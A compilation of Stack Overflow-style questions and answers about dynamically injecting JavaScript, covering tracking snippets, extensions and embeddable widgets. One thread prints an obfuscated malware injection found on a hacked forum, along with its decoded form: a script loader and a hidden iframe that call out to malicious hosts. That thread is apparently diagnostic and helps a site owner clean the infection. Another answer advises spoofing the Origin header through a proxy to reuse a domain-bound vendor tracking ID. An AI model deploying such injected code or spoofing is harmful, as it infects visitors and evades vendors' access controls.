i am new here and i have a javascript tracking code
var _trackingCode = '5sulid5e';
(function() {
var wa = document.createElement('script');
wa.type = 'text/javascript';
wa.async = true;
wa.src = '//cdn.8digits.com/automation.js';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wa, s);
})();
i want to customize that for work on another website.
it works on vestel.com.tr but it doesnt work on mavi.com .
How can i customize that script for mavicom.
Thanks for your help.
Perhaps, you can hack this by writing a proxy, as some vendors may bind tracking IDs with a specific domain.
Forward the ajax from the vendor's JS code to your proxy server. In your proxy server modify the origin request header as the registered header i.e. vestel.com.tr .For this you will need to modify the JS code provided by vendor located at cdn.8digits.com/automation.js and then in script tag of your website provide the script source as your hacked JS, NOT the actual one.
PS you can't modify the origin header in the browser's AJAX itself due to security restriction by browsers.
Related
If I have JS script on several different websites, is it possible to enable or disable script execution for specific sites? If this isn't possible, other suggestions for implementation are welcome.
Here's the application:
I have a script tag with my JS source link that site owners can put on their website to enable interaction with my service. However, I would like to be able to enable/disable the service for specific sites so as not to deploy it until they are ready.
note: The script tag also includes site verification information so it gets put on their site before they are ready to deploy. This saves the step of putting in a site verification tag and then going back and putting in the script.
You would want them to put your .ashx handler on your website, then make that return the javascript.
Follow tutorial for ashx page if you are unsure how to http://www.brainbell.com/tutorials/ASP/Generic_Handlers_(ASHX_Files).html
in the processrequest() function:
Check to see if they have it enabled you can use the querystring to see which website it is https://msdn.microsoft.com/en-us/library/system.web.httprequest.querystring(v=vs.110).aspx in the code below there is ?yourwebsitedomain=customersdomain so you would query for "yourwebsitedomain" and you would get "customersdomain"
If they do then Get the bytes of your file using Encoding.UTF8.GetBytes(File.ReadAllText(filename))
and write the results to the output
context.Response.OutputStream.Write(FileBytes, 0, FileBytes.Length);
context.Response.OutputStream.Flush();
Your Customers Website:
<script>
(function() {
var c = document.createElement('script');
c.type = 'text/javascript'; c.async = true;
c.src = "http://yourdomane/yourhandler.ashx?yourwebsitedomain=customersdomain";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(c,s);
})();
</script>
Hope this helps.
I'm using a tracking site to get some statistics. They say I should use the code:
var trackingstring = new String("<script src=\"http://trackingsite.com/track?C=12345&source=js\" type=\"text/javascript\"></script>");
document.write(trackingstring);
However I want to trigger a particular site statistic on a JQuery event rather than on page load, so I can't use document.write.
I believe there's actually no script to run at the URL, so I tried:
var thetrackingURL = "http://trackingsite.com/track?C=12345&source=js";
$.get(thetrackingURL);
However that gives me the error:
MLHttpRequest cannot load http://trackingsite.com/track?C=12345&source=js. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://example.com' is therefore not allowed access.
How can I trigger that URL to be loaded by a JQuery event?
Try
var script = document.createElement("script");
script.src = "http://trackingsite.com/track?C=12345&source=js";
document.body.appendChild(script);
or, utilizing jquery
$.ajaxSetup({context:document.body});
$.getScript("http://trackingsite.com/track?C=12345&source=js");
Please read. https://security.stackexchange.com/questions/43639/why-is-the-access-control-allow-origin-header-necessary
Host your page on some local web-server using NGINX or anything else suitable.
I'm sure if you search even stackoverflow, you will find lot's of information regarding this topic.
I am making a chrome extension and I would like to make use of a third party API but I am running into some issues and I've been stuck on this problem for a while...
Problem:
I cannot make use of the functions in the API even though the chrome Dev tool says that the API was loaded successfully.
I've tried to load the API at different times to see if that would make a difference but it doesn't seem to.
I've used the API successfully in a basic web page. But I cannot seem to get it working in the content script of the extension.
Here's the code to load the API:
(function() {
var scr = document.createElement('script');
scr.type = 'text/javascript';
scr.src = 'someurl';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(scr, s);
})();
Manifest:
"content_security_policy": "script-src 'self' someurl; object-src 'self'"
I've also done the tutorial that Google offers on how to use Google Analytics within an extension because I thought it would be relevant. But no luck. Any guidance would be appreciated.
You are injecting the API into the context of the webpage when you append a script tag; your content script remains isolated from it.
To circumvent that, one possible solution is to also append some of your code, that would then talk to your extension, either through DOM or through external messages
My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
As such, I have two questions:
Is this actually the offending code?
And how do I remove it?
I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.
Thanks for any help.
JS Beautifier decompresses that as this:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.
Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
Kind of strange to be appending it to the head.
The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.
It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
First thing you should do is to change your FTP or SSH login and password.
The above looks like an FTP exploit. Looks like either you are out of date with your OS updates or you are letting whole world write to your files.
Even though you overwrite your files the problem may come back. So I strongly suggest to check
note the last modified date of the files in question.
check your FTP, SSH, Access logs to see if you can find something fishy.
1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack.
1b. Overwrite your files from Backup
if your apache or any webserver that you are using does not have a pending update.
Check the file permission for you website
Change your FTP password immediately
Advise: change your passwords to something strong. e.g. KLioof*(&^paswl
It was actually hiding in includes/functions.php on lines 6844 and 6845, the two lines were were replacing </head> with their script+</head>
Tough one to find and smart too.
I resolved this problem. You must find and delete Base64 function with shady string in site files. It decode this script from string.
I'm working on a plugin that will be added to external sites, something like the Meebo/Wibiya bar. I'm looking into how to version my files.
What I want to achieve:
The website only has to add a few lines of <script> to their site.
I'll be able to silently upgrade the js file they're using, if I choose to, without them modifying their code.
I'll be able to serve different js files for different websites.
JS files will be cached unless they change.
I'll be able to perform A/B tests (i.e., have 2 different JS files loaded for a single website, randomly chosen for each visitor).
How can I go about achieving all these goals? Or at least as many of them as possible?
Of the top of my head, I think something like the following should get things moving.
You could use some sort of API key to identify the remote sites,
you could also use the HTTP referer but that's not completely
reliable. Then, copy what Google Analytics does and get the clients
to embed a little bit of JavaScript like this:
var _edan_cfg = _edan_cfg || { };
_edan_cfg.apiKey = 'The-API-key-goes-here'; // Just in case you want it later.
(function() {
var e = document.createElement('script');
e.type = 'text/javascript';
e.async = true;
e.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www')
+ '.your-domain-name.com/some_sensible_path/'
+ encodeURIComponent(_edan_cfg.apiKey);
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(e, s);
})();
That should satisfy your first two points.
On the server side you extract the API key from the incoming path,
that key tells you what site you're talking to so you can send back
whatever JavaScript is appropriate. You can use the HTTP caching
headers to attempt to control caching. That should take care of
points two and three.
The last requirement is a bit more interesting but nothing impossible.
The script you send back can always support multiple renderings or
behaviors, the script can also choose which behavior based on
whatever conditions you can think of. The script can also load more
scripts from your server by creating more <script> tags as above.